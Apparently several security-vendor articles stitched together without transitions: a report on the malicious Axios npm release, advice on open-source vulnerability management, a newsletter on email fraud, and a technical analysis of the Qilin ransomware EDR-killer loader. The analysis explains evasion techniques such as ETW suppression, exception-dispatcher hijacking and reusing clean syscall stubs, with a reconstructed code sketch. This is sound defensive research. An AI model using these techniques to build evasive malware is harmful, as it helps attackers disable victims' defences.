In the span of just a few weeks, we have observed a dizzying array of major supply chain attacks. Prominent examples include the malicious modification of Axios, a popular HTTP client library for JavaScript, as well as cascading compromises from TeamPCP, a “chaos-as-a-service” group that injected malicious code into hijacked GitHub repositories for open-source projects, including Trivy, an open-source security scanner.
The impact of these supply chain attacks can be vast. Axios receives 100 million downloads weekly, and innumerable organizations rely on the frameworks and libraries compromised by TeamPCP. The headache they pose to organizations and their security personnel is considerable as well; affected utilities can be integrated so deeply that they may be difficult to fully catalog, let alone remediate.
Although the timing, scale, and severity of these attacks can be shocking, this is not a new phenomenon. The supply chain has remained an attractive target for some time because of its fragility and the fact that a successful compromise can lead to countless additional downstream victims.
Findings from the recently published Talos 2025 Year in Review illustrate these long-standing trends. Nearly 25% of the top 100 targeted vulnerabilities we observed in 2025 affect widely used frameworks and libraries. Digging deeper into the list reveals additional insights. The React2Shell vulnerability affecting React Server Components became the top-targeted vulnerability of 2025 despite being disclosed in December, reflecting the speed at which these supply chain attacks can reach massive scale. The presence of Log4j vulnerabilities shows how deeply embedded these utilities can be and therefore how difficult it can be to reduce the attack surface. Although these particular examples represent extant vulnerabilities that can be weaponized by numerous adversaries, rather than a deliberate attack carried out by a single adversary, they show how impactful and disruptive threats to the supply chain can be. Follow-on attacks can range from ransomware to espionage, which is reflective of the broad swath of adversaries that carry them out — from sophisticated state-sponsored groups to teenage cyber criminals.
If we are all building on such a shaky foundation, what can we do to keep safe? After all, it certainly seems dire when a tool such as Trivy, which we would normally use to scan for supply chain vulnerabilities, becomes compromised itself. But there are concrete steps we can take to improve our security posture.
As highlighted in the Year in Review, protecting identity is key. This includes securing CI/CD pipelines to prevent these types of compromises from occurring in the first place, as well as limiting the impact and lateral movement of an adversary should they obtain access to a downstream victim.
In addition, organizations must do their best to inventory the software libraries and frameworks they employ, stay informed of security incidents, and respond rapidly to implement patching and other mitigations.
Just as supply chain attacks are evergreen, so too is the efficacy of security fundamentals, such as segmentation, robust logging, multi-factor authentication (MFA), and the implementation of emergency response plans.
As trust continues to break down, the only viable solution may be to double down on vigilance. Since this recent spate of attacks represents a trend that will likely only grow in intensity and breadth, the time for action and planning is now.
Coverage
Below, find a sample of the recent coverage we offer to protect against these threats:
ClamAV: Txt.Trojan.TeamPCP-10059839-0
Behavioral Protections: LiteLLM Supply Chain Compromise – alerts during installation of compromised packages
Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.
Axios is a widely deployed HTTP client library for JavaScript that simplifies HTTP requests, particularly to REST endpoints. The malicious packages were only available for approximately three hours, but Talos strongly encourages anyone who downloaded them to roll all deployments back to the previous known-safe versions (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.
Details of supply chain attack
The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload for Linux, macOS, or Windows.
On macOS, a binary, “com.apple.act.mond”, is downloaded and run using zsh. Windows is delivered a ps1 file, which copies the legitimate PowerShell executable to “%PROGRAMDATA%\wt.exe” and executes the downloaded ps1 file with hidden-window and execution-policy-bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with the typical associated capabilities, allowing the actor to gather information and run additional payloads.
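The infection vector here is npm’s install-time lifecycle scripts, which run automatically when a package is installed. As a defensive illustration — a minimal sketch, not Talos tooling; the sample manifest and hook list are assumptions — a package manifest can be checked for hooks that execute at install time:

```python
import json

# npm lifecycle hooks that run automatically during "npm install" and are
# therefore a common vehicle for supply chain payloads (assumed hook list).
RISKY_HOOKS = {"preinstall", "install", "postinstall"}

def risky_install_hooks(package_json_text: str) -> list[str]:
    """Return install-time script hooks declared in a package.json manifest."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return sorted(hook for hook in scripts if hook in RISKY_HOOKS)
```

A hit is not proof of malice — many legitimate packages compile native code post-install — but it is a useful triage signal when reviewing a newly added dependency.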
Impact
As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials and deployed a payload with remote management capabilities. Therefore, Talos strongly recommends that organizations treat any credentials present on systems with the malicious package as compromised and begin rotating them as quickly as possible. Actors are likely to try to weaponize this access quickly to maximize financial gain.
Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.
Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.
As we discussed in a previous post, modern software development is practically unthinkable without the use of open-source components. But in recent years the associated risks have become increasingly diverse, complex, and numerous. When vulnerabilities affect a company’s infrastructure and code faster than they can be remediated, when vulnerability data is unreliable and incomplete, and when malware may be lurking within popular components, it’s not enough to simply scan version numbers and toss fix-it tickets at the IT team. Vulnerability management must be expanded to cover software download policies, guardrails for AI assistants, and the entire software build pipeline.
A trusted pool of open-source components
The main part of the solution is to prevent the use of vulnerable and malicious code. The following measures should be implemented:
Having an internal repository of artifacts. The sole source of components for internal development needs to be a unified repository to which components are admitted only after a series of checks.
Performing rigorous component screening. These checks cover the known versions of the component, known vulnerable and malicious versions, the publication date, activity history, and the reputation of the package and its authors. Scanning the entire contents of the package, including build instructions, test cases, and other auxiliary data, is mandatory. To filter the registry during ingestion, use specialized open-source scanners or a comprehensive cloud workload security solution.
Enforcing dependency pinning. Build processes, AI tools, and developers mustn’t use floating version specifiers (such as “latest”) when declaring dependencies. Project builds need to be based on verified, exact versions. At the same time, pinned dependencies must be regularly updated to the latest verified versions that maintain compatibility and are free of known vulnerabilities. This significantly reduces the risk of supply chain attacks through the compromise of a well-known package.
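The pinning rule above can be enforced mechanically. Here is a minimal sketch — assumed logic, not a product feature — that flags floating npm version specifiers in a manifest:

```python
import json
import re

# Specifiers that let the resolver pick a newer, unreviewed release
# (caret/tilde ranges, comparisons, wildcards, or the "latest" tag).
FLOATING = re.compile(r"^(\^|~|>=?|<=?|\*|latest)")

def unpinned_dependencies(package_json_text: str) -> dict[str, str]:
    """Return dependencies whose version specifier is not an exact pin."""
    manifest = json.loads(package_json_text)
    deps = {**manifest.get("dependencies", {}),
            **manifest.get("devDependencies", {})}
    return {name: spec for name, spec in deps.items() if FLOATING.match(spec)}
```

A check like this can run in CI and fail the build whenever it returns a non-empty result, forcing developers (and AI assistants) to declare exact, verified versions.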
Improving vulnerability data
To identify vulnerabilities more effectively and prioritize them properly, an organization needs to establish several IT and security processes:
Vulnerability data enrichment. Depending on the organization’s needs, this means either enriching information in-house by combining data from NVD, EUVD, BDU, the GitHub Advisory Database, and osv.dev, or purchasing a commercial vulnerability intelligence feed where the data is already aggregated and enriched. In either case, it’s worth additionally monitoring threat intelligence feeds to track real-world exploitation trends and gain insight into the profile of attackers targeting specific vulnerabilities. Kaspersky provides a specialized data feed specifically focused on open-source components.
In-depth software composition analysis. Specialized software composition analysis (SCA) tools allow for the correct navigation of the dependency chain in open-source code to fully inventory the libraries being used, and discover outdated or unsupported components. Data on healthy components also comes in handy to enrich the artifact registry.
Identifying abandonware. Even if a component isn’t formally vulnerable and hasn’t been officially declared unsupported, the scanning process should flag components that haven’t received updates for more than a year. These warrant separate analysis and potential replacement, much like EOL components.
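The staleness check described above reduces to a date comparison. A minimal sketch — the one-year threshold and the release-date map are assumptions for illustration; real SCA tools pull this metadata from the registries:

```python
from datetime import date, timedelta

STALE_AFTER = timedelta(days=365)  # assumed policy threshold

def flag_abandonware(last_release: dict[str, date], today: date) -> list[str]:
    """Return components whose most recent release is over a year old."""
    return sorted(name for name, released in last_release.items()
                  if today - released > STALE_AFTER)
```

Flagged components are candidates for the same treatment as formally EOL software: separate analysis and potential replacement.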
Securing AI code and AI agents
The activities of AI systems used in coding must be wrapped in a comprehensive set of security measures — from input data filtering to user training:
Restrictions on dependency recommendations. Configure the development environment to make sure that AI agents and assistants can only reference components and libraries from the trusted artifact registry. If these don’t contain the right tools, the model should trigger a request to include the dependency in the registry, rather than pulling something from PyPI that simply matches the description.
Filter model outputs. Despite these restrictions, anything generated by the model must also be verified to ensure the AI code doesn’t contain outdated, unsupported, vulnerable, or made-up dependencies. This check should be integrated directly into the code acceptance process or the build preparation stage. It doesn’t replace the traditional static analysis process: SAST tools must still be embedded in the CI/CD pipeline.
Developer training. IT and security teams must be intimately familiar with the characteristics of AI systems, their operating principles, and common errors. To achieve this, employees should complete a specialized training course tailored to their specific roles.
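The first two measures above — restricting recommendations to the trusted registry and filtering model outputs — amount to a gate between the model and the build. A minimal sketch of such a gate (the registry structure and verdict strings are assumptions):

```python
def audit_ai_dependencies(suggested: dict[str, str],
                          trusted: dict[str, set[str]]) -> dict[str, str]:
    """Check AI-suggested dependencies against a trusted artifact registry.

    `suggested` maps package name -> version the model emitted;
    `trusted` maps package name -> the set of verified versions.
    """
    verdicts = {}
    for name, version in suggested.items():
        if name not in trusted:
            verdicts[name] = "unknown package (possible hallucination)"
        elif version not in trusted[name]:
            verdicts[name] = "unverified version (request registry review)"
        else:
            verdicts[name] = "ok"
    return verdicts
```

Anything other than “ok” should block acceptance of the generated code and trigger a request to vet the dependency, rather than a fallback to a public registry.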
Systematic removal of EOL components
If a company’s systems utilize outdated open-source components, a systematic, consistent approach to addressing their vulnerabilities should be taken. There are three primary methods for doing this:
Migration. This is the most organizationally complex and expensive method, involving the total replacement of a component followed by the adaptation, rewriting, or replacement of the applications built upon it. Deciding on a migration is especially daunting when it demands a massive overhaul of all internal code. This frequently affects core components: there is no easy way to migrate away from Node.js 14 or Python 2.
Long-term support (LTS). A dedicated support-services market exists for large-scale legacy projects. Sometimes this involves a fork of the legacy system maintained by third-party developers; in other cases, specialized teams backport patches that fix specific vulnerabilities into older, unsupported versions. Transitioning to LTS generally requires ongoing support costs, but this can still be more cost-effective than a full migration in many cases.
Security, IT, and business must work together to choose a path for every documented EOL or abandoned component, and reflect that choice in the company’s asset registries and SBOMs.
Risk-based open-source vulnerability management
All of the measures listed above reduce the volume of vulnerable software and components entering the organization, and simplify the detection and remediation of flaws. Despite this, it’s impossible to eliminate every single defect: the number of applications and components is simply growing too fast.
Therefore, prioritizing vulnerabilities based on real-world risk remains essential. The risk assessment model must be expanded to account for the characteristics of open source, answering the following questions:
Is the vulnerable code branch actually executed in the organization’s environment? A reachability analysis for discovered vulnerabilities should be performed. Many defective code snippets are never actually run within the organization’s specific implementation, making the vulnerability impossible to exploit. Certain SCA solutions can perform this analysis. This same process permits evaluating an alternative scenario: what happens if the vulnerable procedures or components are removed from the project entirely? Sometimes, this method of remediation proves to be surprisingly painless.
Is the defect being exploited in real-world attacks? Is a PoC available? The answers to these questions are part of standard prioritization frameworks like EPSS, but tracking must be conducted across a much broader set of intelligence sources.
Has cybercriminal activity been reported in this dependency registry, or in related and similar components? These are additional factors for prioritization.
Considering these factors allows the team to allocate resources effectively and remediate the most dangerous defects first.
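At its core, the reachability analysis from the first question is a traversal of the program’s call graph: a flaw matters only if some entry point can reach the vulnerable function. A toy sketch — in practice the call graph comes from an SCA or static analysis tool; this one is hand-written for illustration:

```python
from collections import deque

def reachable(call_graph: dict[str, list[str]],
              entry_points: list[str]) -> set[str]:
    """Breadth-first walk of a static call graph from the app's entry points."""
    seen = set(entry_points)
    queue = deque(entry_points)
    while queue:
        fn = queue.popleft()
        for callee in call_graph.get(fn, []):
            if callee not in seen:
                seen.add(callee)
                queue.append(callee)
    return seen

# Hypothetical app: "lib.parse" is the vulnerable branch, never called
# from "main" in this deployment.
graph = {
    "main": ["lib.fetch"],
    "lib.fetch": ["lib.decode"],
    "lib.parse": ["lib.decode"],
}
```

In this toy graph, `lib.parse` never appears in `reachable(graph, ["main"])`, so a flaw confined to it would be unexploitable in this specific implementation — exactly the case the text describes.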
Transparency is the new black
The security bar for open-source software is only going to keep on rising. Companies developing applications — even for internal use — will face regulatory pressures demanding documented and verifiable cybersecurity within their systems. According to the estimates of Sonatype experts, 90% of companies globally already fall under one or more requirements to provide evidence of the reliability of the software they use; therefore, the experts deem transparency “the currency of software supply chain security”.
By controlling the use of open-source components and applications, enriching threat intelligence, and strictly monitoring AI-driven development systems, organizations can introduce the innovations the business craves — all while clearing the high bar set by regulators and customers alike.
It used to be that only specialized software houses and tech giants had to lose sleep over open-source vulnerabilities and supply chain attacks. But times have changed. Today, even small businesses are running their own development shops, making the problem relevant for everyone. At every other company, internal IT teams are busy writing code, configuring integrations, and automating workflows, even if the core business has absolutely nothing to do with software. It’s what modern business efficiency demands. However, the byproduct is a new breed of software vulnerability: the kind that’s far more complicated to fix than simply installing the latest Windows update.
Modern software development is inseparable from open-source components. However, the associated risks have proliferated in recent years, increasing in both variety and sophistication. We’re seeing malicious code injected into popular repositories, fragmented and flawed vulnerability data, systematic use of outdated, vulnerable components, and increasingly complex dependency chains.
The open-source vulnerability data shortage
Even if your organization has a rock-solid vulnerability management process for third-party commercial software, you’ll find that open-source code requires a complete overhaul of that process. The most widely used public databases are often incomplete, inaccurate, or just plain slow to get updates when it comes to open source. This turns vulnerability prioritization into a guessing game. No amount of automation can help you if your baseline data is full of holes.
According to data from Sonatype, about 65% of open-source vulnerabilities assigned a CVE ID lack a severity score (CVSS) in the NVD — the most widely used vulnerability knowledge base. Of those unscored vulnerabilities, nearly 46% would actually be classified as High if properly analyzed.
Even when a CVSS score is available, different sources only agree on the severity about 55% of the time. One database might flag a vulnerability as Critical, while another assigns a Medium score to it. More detailed metadata like affected package versions is often riddled with errors and inconsistencies too. Your vulnerability scanners that compare software versions end up crying wolf with false positives, or falsely giving you a clean bill of health.
The deficit in vulnerability data is growing, and the reporting process is slowing down. Over the past five years, the total number of CVEs has doubled, but the number of CVEs lacking a severity score has exploded by a factor of 37. According to Tenable, by 2025, public proof-of-concept (PoC) exploit code was typically available within a week of a vulnerability’s discovery, but getting that same vulnerability listed in the NVD took an average of 15 days. Enrichment processes, such as assigning a CVSS score, are even slower: Sonatype estimates the median time to assign a CVSS score at 41 days, with some defects remaining unrated for up to a year.
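When feeds disagree this often, a common enrichment policy is to merge them conservatively and keep the worst-case rating per CVE. A minimal sketch of that merge — the feed format and severity ladder here are assumptions, not any vendor’s schema:

```python
# Qualitative CVSS severity ladder, lowest to highest (assumed ordering).
SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

def worst_case_severity(feeds: list[dict[str, str]]) -> dict[str, str]:
    """Merge CVE -> severity maps from several feeds, keeping the worst case."""
    merged: dict[str, str] = {}
    for feed in feeds:
        for cve, severity in feed.items():
            sev = severity.lower()
            if SEVERITY_RANK[sev] > SEVERITY_RANK.get(merged.get(cve), -1):
                merged[cve] = sev
    return merged
```

A conservative merge trades some false urgency for the guarantee that a Critical rating from any one source is never silently downgraded by another.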
The legacy open-source code problem
Libraries, applications, and services that are no longer maintained — either being abandoned or having long reached their official end of life (EOL) — can be found in 5 to 15% of corporate projects, according to HeroDevs. Across five popular open-source code registries, there are at least 81 000 packages that contain known vulnerabilities but belong to outdated, unsupported versions. These packages will never see official patches. This “legacy baggage” accounts for about 10% of packages in Maven Central and PyPI, and a staggering 25% in npm.
Using this kind of open-source code breaks the standard patch management lifecycle: you can’t update, automatically or manually, a dependency that is no longer supported. Furthermore, when EOL versions are omitted from official vulnerability bulletins, security scanners may categorize them as “not affected” by a defect and ignore them.
A prime example of this is Log4Shell, the critical (CVSS 10) vulnerability in the popular Log4j library discovered back in 2021. The vulnerable version accounted for 40 million out of 300 million Log4j downloads in 2025. Keep in mind that we’re talking about one of the most infamous and widely reported vulnerabilities in history — one that was actively exploited, patched by the developer, and addressed in every major downstream product. The situation for less publicized defects is significantly worse.
Compounding this issue is the visibility gap. Many organizations lack the tools necessary to map out a complete dependency tree or gain full visibility into the specific packages and versions embedded within their software stack. As a result, these outdated components often remain invisible, never even making it into the remediation queue.
Malware in open-source registries
Attacks involving infected or inherently malicious open-source packages have become one of the fastest-growing threats to the software supply chain. According to Kaspersky researchers, approximately 14 000 malicious packages were discovered in popular registries by the end of 2024, a 48% year-over-year increase. Sonatype reported an even more explosive surge throughout 2025 — detecting over 450 000 malicious packages.
The motivation behind these attacks varies widely: cryptocurrency theft, harvesting developer credentials, industrial espionage, gaining infrastructure access via CI/CD pipelines, or compromising public servers to host spam and phishing campaigns. These tactics are employed by both spy APT groups and financially motivated cybercriminals. Increasingly, compromising an open-source package is just the first step in a multi-stage corporate breach.
Common attack scenarios include compromising the credentials of a legitimate open-source package maintainer, publishing a “useful” library with embedded malicious code, or publishing a malicious library with a name nearly identical to a popular one. A particularly alarming trend in 2025 has been the rise of automated, worm-like attacks. The most notorious example is the Shai-Hulud campaign. In this case, malicious code stole GitHub and npm tokens and kept infecting new packages, eventually spreading to over 700 npm packages and tens of thousands of repositories. It leaked CI/CD secrets and cloud access keys into the public domain in the process.
While this scenario technically isn’t related to vulnerabilities, the security tools and policies required to manage it are the same ones used for vulnerability management.
How AI agents increase the risks of open-source code usage
The rushed, ubiquitous integration of AI agents into software development significantly boosts developer velocity, but it also amplifies any error. Without rigorous oversight and clearly defined guardrails, AI-generated code is exceptionally vulnerable. Research shows that 45% of AI-generated code contains flaws from the OWASP Top 10, while 20% of deployed AI-driven applications harbor dangerous configuration errors.

This happens because AI models are trained on massive datasets that include large volumes of outdated, demonstrational, or purely educational code. These systemic issues resurface when an AI model decides which open-source components to include in a project. The model is often unaware of which package versions currently exist, or which have been flagged as vulnerable. Instead, it suggests a dependency version pulled from its training data, which is almost certainly obsolete. In some cases, models attempt to call non-existent versions or entirely hallucinated libraries. This opens the door to dependency confusion attacks.
In 2025, even leading LLMs recommended incorrect dependency versions — simply making up an answer — in 27% of cases.
Can AI just fix everything?
It’s a simple, tempting idea: just point an AI agent at your codebase and let it hunt down and patch every vulnerability. Unfortunately, AI can’t fully solve this problem. The fundamental hurdles we’ve discussed handicap AI agents just as much as human developers. If vulnerability data is missing or unreliable, then instead of finding known vulnerabilities, you’re forced to rediscover them from scratch. That’s an incredibly resource-intensive process requiring niche expertise that remains out of reach for most businesses.
Furthermore, if a vulnerability is discovered in an obsolete or unsupported component, an AI agent cannot “auto-fix” it. You’re still faced with a need to develop custom patches or execute a complex migration. If a flaw is buried deep within a chain of dependencies, AI is likely to overlook it entirely.
What to do?
To minimize the risks described above, it will be necessary to expand the vulnerability management process to include open-source package download policies, AI assistant operating rules, and the software build process. This includes:
Welcome to this week’s edition of the Threat Source newsletter.
Last weekend, I witnessed a crime. Not a notable crime that you might read about in the press, but an unremarkable fraud attempt that nevertheless illustrates how new threat actor capabilities are emerging.
I imagine that most people reading this probably field IT questions from friends, family, and your local community. I assist with the IT provision for a local community association. It’s not a wealthy, large association — just your typical volunteer-run nonprofit like many others in the region providing community services.
This weekend, the chair emailed the treasurer requesting a bank transfer. The treasurer replied asking for the recipient’s details, and the chair promptly responded. The emails appeared authentic: correct names, a sum consistent with the association’s regular expenditure. Yet something made the treasurer pause. The reason for the transfer felt vague, and the tone seemed slightly off. They picked up the phone to verify. The chair had no idea what they were talking about. The emails and the request were an attempted fraud by a third party.
This is a variant of the business email compromise (BEC) scam in which an attacker impersonates a trusted individual and requests a fund transfer to an account they control. The attacker relies on social engineering to trick someone with payment authority to send the money. Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail and drastically reducing the chances of recovery.
The initial email is often sent from a plausible email address. Closely scrutinising the sender’s email address may not help, since the attack may originate from the sender’s genuine account that has previously been compromised.
Historically, BEC targeted large organisations, where the anticipated payout more than covered the time investment required to research key personnel and craft targeted attacks.
However, the fact that attackers are willing to target a small community organisation for a relatively small sum of money shows that the economics of the attack have changed.
AI has fundamentally altered the economics of BEC. Attackers can now reconnoitre many small organisations rapidly and cheaply. AI-generated content can be tailored to each target: referencing specific projects, using appropriate terminology, matching organisational tone.
The attack no longer needs to be labour-intensive or highly targeted. It’s become democratised, and an accessible playbook for targeting any organisation. Community associations, local charities, or small businesses can now be targeted, both because the attack is easier to execute, but also because scamming smaller sums from many victims can be as profitable as scamming large sums from few victims. Unfortunately, because this profile of organisation may never have encountered this threat before, they may be unaware and consequently more vulnerable.
For every treasurer who pauses when something doesn’t quite feel right, there are others who will accept an apparently legitimate email at face value. Protection begins with awareness of how the fraud operates. Be suspicious of any unexpected request for payment, especially if there is a sense of urgency or reasons why a phone call “isn’t possible” right now. Verify through separate channels before any transfer occurs. Call a known number for your contact, not one provided in the suspicious email. Enforce strict procurement rules that prevent any last-minute urgent payments.
Above all, recognise the democratisation of business email compromise scams. They’re no longer something that only happens to large corporations with complex supply chains and international operations. They’re for everyone now.
The one big thing
Cisco Talos has identified a large-scale automated credential harvesting campaign that exploits React2Shell, a remote code execution vulnerability in Next.js applications (CVE-2025-55182). Using a custom framework called “NEXUS Listener,” the attackers automatically extract and aggregate sensitive data — including cloud tokens, database credentials, and SSH keys — from hundreds of compromised hosts to facilitate further malicious activity.
Why do I care?
This campaign uses high-speed automation to exploit React2Shell, enabling attackers to rapidly harvest high-value credentials and establish persistent, unauthenticated access. This creates significant risks for lateral movement and supply chain integrity. Furthermore, the centralized aggregation of stolen data allows attackers to map infrastructure for targeted follow-on attacks and potential data breaches.
So now what?
Organizations should immediately audit Next.js applications for the React2Shell vulnerability and rotate all potentially compromised credentials, including API keys and SSH keys. Enforce IMDSv2 on AWS instances and implement RASP or tuned WAF rules to detect malicious payloads. Finally, apply strict least-privilege access controls within container environments to limit the potential impact of a compromise.
F5 BIG-IP DoS flaw upgraded to critical RCE, now exploited in the wild The US cybersecurity agency CISA on Friday warned that threat actors have been exploiting a critical-severity F5 BIG-IP vulnerability in the wild. (SecurityWeek)
European Commission investigating breach after Amazon cloud account hack The threat actor told BleepingComputer that they will not attempt to extort the Commission using the allegedly stolen data, but intend to leak it online at a later date. (BleepingComputer)
Google fixes fourth Chrome zero-day exploited in attacks in 2026 As detailed in the Chromium commit history, this vulnerability stems from a use-after-free weakness in Dawn, the underlying cross-platform implementation of the WebGPU standard used by the Chromium project. (BleepingComputer)
Anthropic inadvertently leaks source code for Claude Code CLI tool Anthropic quickly removed the source code, but users have already posted mirrors on GitHub. They are actively dissecting the code to understand the tool’s inner workings. (Cybernews)
Can’t get enough Talos?
Qilin EDR killer infection chain Take a deep dive into the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market.
An overview of 2025 ransomware threats in Japan In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging Qilin ransomware were observed most frequently.
A discussion on what the data means for defenders To unpack the biggest Year in Review takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security.
When attackers become trusted users The latest TTP draws on 2025 Year in Review data to explore how identity is being used to gain, extend, and maintain access inside environments.
Endpoint detection and response (EDR) tools are widely deployed and far more capable than traditional antivirus. As a result, attackers use EDR killers to disable or bypass them.
Disabling telemetry collection (process, memory, network activity) limits what defenders can see and analyze.
As defenders improve behavioral detection, attackers increasingly target the defense layer itself as part of their initial access or early execution stages.
This blog provides an in-depth analysis of the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market.
We present multiple techniques used by the malware to evade and ultimately disable EDR solutions, including SEH/VEH-based obfuscation, kernel object manipulation, and various API and system call bypass methods.
This blog post provides an in-depth technical analysis of the malicious dynamic-link library (DLL) “msimg32.dll”, which Cisco Talos observed being deployed in Qilin ransomware attacks. The broader activities and attacks of Qilin were previously introduced and described in the blog post here.
This DLL represents the initial stage of a sophisticated, multi-stage infection chain designed to disable local endpoint detection and response (EDR) solutions present on compromised systems. Figure 1 shows a high-level diagram demonstrating the overall execution flow of this infection chain.
Figure 1. Infection chain overview.
The first stage consists of a PE loader responsible for preparing the execution environment for the EDR killer component. This secondary payload is embedded within the loader in an encrypted form.
The loader implements advanced EDR evasion techniques. It neutralizes user-mode hooks and suppresses Event Tracing for Windows (ETW) event generation at runtime by leveraging a -like approach. Additionally, it makes extensive use of structured exception handling (SEH) and vectored exception handling (VEH) to obscure control flow and conceal API invocation patterns. This enables the EDR killer payload to be decrypted, loaded, and executed entirely in memory without triggering detection by the locally installed EDR solution.
Once active, the EDR killer component loads two helper drivers. The first driver (“rwdrv.sys”) provides access to the system’s physical memory, while the second driver (“hlpdrv.sys”) is used to terminate EDR processes. Prior to loading the second driver, the EDR killer component unregisters monitoring callbacks established by the EDR, ensuring that process termination can proceed without interference.
Overall, the malware is capable of disabling over 300 different EDR drivers across a wide range of vendors. While the campaign has been previously reported by , , and others at a higher level, this analysis focuses on previously undocumented technical details of the infection chain (e.g., the SEH/VEH tricks and the overwriting of certain kernel objects).
PE loader section (“msimg32.dll”)
The malicious DLL is most likely side-loaded by a legitimate application that imports functions from “msimg32.dll”. To preserve expected functionality, the original API calls are forwarded to the legitimate library located in “C:\Windows\System32”.
The version of “msimg32.dll” deployed by the threat actor triggers its malicious logic from within its DllMain function. As a result, the payload is executed as soon as the legitimate application loads the DLL.
Figure 2. Malicious version of “msimg32.dll”.
Sophos also gave some technical and historical insights into this loader in their earlier blog, in which it is referred to as Shanya.
Initialization phase
During initialization, the loader allocates a heap buffer in process memory that acts as a slot-policy table.
Figure 3a. Allocating buffer for slot-policy table.
The size of this buffer is computed as “ntdll.dll” OptionalHeader.SizeOfCode divided by 16 (SizeOfCode >> 4), resulting in one byte per 16-byte code slot covering the code region as defined by OptionalHeader.SizeOfCode (typically the .text range). Each entry in the table corresponds to a fixed 16-byte block relative to BaseOfCode.
The loader then iterates over the export table of “ntdll.dll”. For each exported function whose name begins with “Nt”, the virtual address of the corresponding syscall stub is resolved. From this address, a slot index is calculated as: slot_idx = (FuncVA - BaseOfCode) / 16
This index is used to mark the corresponding entry in the slot-policy table. All Nt* stubs are assigned a default policy, while selected functions are explicitly marked with special policies, including:
NtTraceEvent
NtTraceControl
NtAlpcSendWaitReceivePort
The result is a data-driven classification of relevant syscall stubs without modifying the executable code of “ntdll.dll”. The resulting slot-policy-table appears as follows:
Figure 3b. Slot-policy table.
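Under the assumption that the export list and code range of “ntdll.dll” have already been parsed, the construction can be sketched as follows. Function names, policy constants, and the toy layout below are illustrative assumptions, not taken from the sample:

```python
# Sketch of the slot-policy table construction described above.
# Policy values and names are illustrative; the sample uses its own
# constants and resolves ntdll's layout at runtime.

SLOT_SIZE = 16
POLICY_DEFAULT = 1      # generic Nt* stub
POLICY_SPECIAL = 2      # e.g., NtTraceEvent, NtTraceControl, ...

SPECIAL_FUNCS = {"NtTraceEvent", "NtTraceControl", "NtAlpcSendWaitReceivePort"}

def build_slot_policy_table(base_of_code, size_of_code, exports):
    """exports: mapping of export name -> virtual address of its stub."""
    table = bytearray(size_of_code >> 4)          # one byte per 16-byte slot
    for name, func_va in exports.items():
        if not name.startswith("Nt"):
            continue
        slot_idx = (func_va - base_of_code) // SLOT_SIZE
        table[slot_idx] = POLICY_SPECIAL if name in SPECIAL_FUNCS else POLICY_DEFAULT
    return table

# Toy example with a fabricated ntdll layout:
exports = {
    "NtOpenSection": 0x1000 + 0x40,
    "NtTraceEvent": 0x1000 + 0x80,
    "RtlFoo": 0x1000 + 0xC0,           # non-Nt export, never classified
}
table = build_slot_policy_table(0x1000, 0x200, exports)
```

The key property, as in the real loader, is that classification is purely data-driven: the executable code of “ntdll.dll” is never modified.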
The actual loader function is significantly more complex and incorporates additional obfuscation techniques, such as hash-based API resolution at runtime.
After constructing the table, the sample dynamically resolves ntdll!LdrProtectMrdata, which will be discussed in greater detail later. It then invokes this routine to change the protection of the .mrdata section to writable. This section contains the exception dispatcher callback pointer along with other critical runtime data.
Once the section is writable, the loader overwrites the dispatcher slot with its own custom exception handler. As a result, its routine is executed whenever an exception is triggered.
Figure 5. Overwriting of exception handler dispatcher slot.
Runtime exception handling
This function primarily performs two tasks: handling breakpoint exceptions and single-step exceptions.
The handling of breakpoint exceptions (0xCC) is relatively straightforward. It simply resumes execution at the instruction immediately following the INT3 (0xCC). Talos is not certain why this approach was implemented. It may function as a lightweight anti-emulation, anti-analysis, or anti-sandbox mechanism for weak analysis systems, serve as groundwork for more advanced anti-debugging techniques, or act as preparation for future control-flow manipulation similar to the VEH-based logic observed in Stages 2 and 3.
Figure 6. Breakpoint logic of hook_function_ExceptionCallback function.
The single-step portion of the function is significantly more complex and is where the previously introduced slot-policy table is utilized. ctx->ntstub_class_map points to the map buffer allocated during initialization.
Figure 7. Single step logic of hook_function_ExceptionCallback function.
Simplified, the logic of the initialization and dispatch functions looks like this in pseudocode. InitCtxAndPatchNtdllMrdataDispatch is the initialization function and hook_function_ExceptionCallback is the dispatch function mentioned above.
Figure 8. Simplified single step SEH logic.
The find_syscall routine shown in Figure 7 implements a syscall recovery technique. Details can be found in the picture below. It scans both backward and forward through “ntdll.dll” to locate intact syscall stubs and identify neighboring syscalls that can be repurposed.
The simplified logic is as follows:
Indirectly determine the target syscall number by scanning forward and backward.
Locate a clean neighboring stub.
Manually load the correct syscall ID into eax.
Transition directly to kernel mode using the syscall instruction (i.e., a syscall instruction located inside a clean neighboring stub).
By reusing a neighboring syscall stub to invoke the desired system call, the loader bypasses EDR-hooked syscalls without modifying the hooked code itself. The Windows kernel only evaluates the syscall ID in eax; it does not verify which exported API function initiated the call.
Figure 9. Halo’s Gate: find_syscall function.
